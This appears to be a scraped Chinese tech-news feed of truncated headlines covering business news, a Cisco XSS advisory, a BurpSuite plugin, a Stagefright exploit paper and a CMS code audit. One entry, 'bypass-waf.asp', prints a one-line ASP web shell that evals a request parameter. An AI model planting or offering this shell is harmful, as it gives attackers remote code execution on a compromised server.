用 text editor 的工程师鄙视用 IDE 的工程师。用 Vim 的工程师鄙视用 Emacs&nbs...
bypass-waf.asp
<%dim x1,x2x1 = request("pass")x2 = x1eval x2%> <!-- yes++ --><!-- 一句话 pass...
郭台铭揭鸿海夏普恩怨真相:被骗了
虎嗅注:郭台铭日前在接受《东洋经济周刊》专访透露了“鸿夏恋”破局的始末, 用“自己被骗”来概括整个事件的全过程。郭台铭透露,当初签约后才知道夏普内部巨额亏损,之后重新议价却由于社长换人而搁浅,原本相约...
Cisco Security Manager Web Framework跨站脚本漏洞
受影响系统:Cisco Security Manager <= 4.6描述:-----------------------------------------------------------...
神兵利刃
国产BurpSuite插件 Assassin V1.1发布
Assassin是国内安全爱好者如果M微笑开发的一款BurpSuite插件,在上周,作者发布了1.0版本,包含了旁注和子域名暴力破解功能。在1.1版本中,作者丰富了一些功能,如下: 1、增加了指纹识别...
WooYun-Drops
Metaphor-A real life Stagefright exploit – virustracker
http://drops.wooyun.org/papers/14181 http://exploit-db.com/docs/39527.pdf 0x00 综述 在本文中,我们研究了如何利用安卓系统...
Seay信息安全博客
Zcncms1.2.8代码审计总结 文件包含漏洞与修复 |
显示不全请点击全屏阅读 先来个介绍: zcncms是站长中国基于php技术开发的内容管理系统,提供了内容编辑、关键词管理、广告管理、链接管理等模块和模型,程序的设计十分简洁并注重了二次开发的要求,可以...
Mysql
标准MySQL数据库外的5个开源兼容方案
MySQL是最受欢迎的免费开源应用之一,它是成千上万个网站的数据库骨干。然而,许多开发人员认为有必要将其拆分成其他项目,并且每个分支项目都要有自己的专长,这些需求以及Oracle对核心产品增长缓慢...
jquery 事件对象属性小结
使用事件自然少不了事件对象. 因为不同浏览器之间事件对象的获取, 以及事件对象的属性都有差异, 导致我们很难跨浏览器使用事件对象. jQuery中统一了事件对象, 当绑定事件处理函数时, 会将jQue...
脱不花对话柳传志:“我对85后的理解与不解,应对互联网如何变与不变”
虎嗅注:今年是联想成立30周年。作为联想创始人,柳传志前段时间发内部信,将联想这30年的成功归功于联想的“发动机文化”。内部信一发出,就引发了争论,年轻一代们对“发动机文化”不感兴趣,他们更愿意选择“...
